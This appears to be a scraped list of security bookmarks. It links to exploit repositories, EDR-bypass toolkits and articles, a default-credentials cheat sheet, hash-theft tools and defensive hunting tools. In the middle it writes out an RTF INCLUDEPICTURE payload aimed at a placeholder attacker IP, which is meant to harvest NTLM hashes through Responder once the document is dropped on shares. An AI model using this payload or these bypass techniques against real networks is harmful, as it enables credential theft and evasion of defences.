GitHub - mohamedbenchikh/CVE-2022-27925
https://github.com/mohamedbenchikh/CVE-2022-27925
https://github.com/mohamedbenchikh/CVE-2022-27925
GitHub - urbanadventurer/WhatWeb: Next generation web scanner
https://github.com/urbanadventurer/whatweb
https://github.com/urbanadventurer/whatweb
GitHub
GitHub - urbanadventurer/WhatWeb: Next generation web scanner
Next generation web scanner. Contribute to urbanadventurer/WhatWeb development by creating an account on GitHub.
Bypass CrowdStrike Falcon EDR protection against process dump like lsass.exe | by bilal al-qurneh | Sep, 2022 | Medium
https://medium.com/@balqurneh/bypass-crowdstrike-falcon-edr-protection-against-process-dump-like-lsass-exe-3c163e1b8a3e
https://medium.com/@balqurneh/bypass-crowdstrike-falcon-edr-protection-against-process-dump-like-lsass-exe-3c163e1b8a3e
Medium
Bypass CrowdStrike Falcon EDR protection against process dump like lsass.exe
One of the main thing you do as a penetration tester when you compromise a windows machine on the network and you want to expand to other…
GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
https://github.com/ihebski/DefaultCreds-cheat-sheet
https://github.com/ihebski/DefaultCreds-cheat-sheet
GitHub
GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers identifying…
One place for all the default credentials to assist the Blue/Red teamers identifying devices with default password 🛡️ - ihebski/DefaultCreds-cheat-sheet
GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
https://github.com/root-tanishq/userefuzz
https://github.com/root-tanishq/userefuzz
GitHub
GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
User-Agent , X-Forwarded-For and Referer SQLI Fuzzer - root-tanishq/userefuzz
Sneaky long-term op tech: drop a Word doc with the following embedded "image" on shares:
'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'
Word auto-includes imgs from UNC paths; with Responder, catch hashes.
'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'
Word auto-includes imgs from UNC paths; with Responder, catch hashes.
GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
https://github.com/optiv/Freeze
https://github.com/optiv/Freeze
GitHub
GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative…
Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods - optiv/Freeze
GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
https://github.com/iperov/DeepFaceLive
https://github.com/iperov/DeepFaceLive
GitHub
GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
Real-time face swap for PC streaming or video calls - iperov/DeepFaceLive
GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
https://github.com/Greenwolf/ntlm_theft
https://github.com/Greenwolf/ntlm_theft
GitHub
GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) - Greenwolf/ntlm_theft
GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper
https://github.com/last-byte/PersistenceSniper
GitHub
GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators…
Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. Official Twitter/X account @PersistSniper. Made w...
Snakes on a Domain: An Analysis of a Python Malware Loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
Huntress
Snakes on a Domain: An Analysis of a Python Malware Loader | Huntress
Join us on a threat analysis journey as we discover a very shady Python—and a very friendly RAT.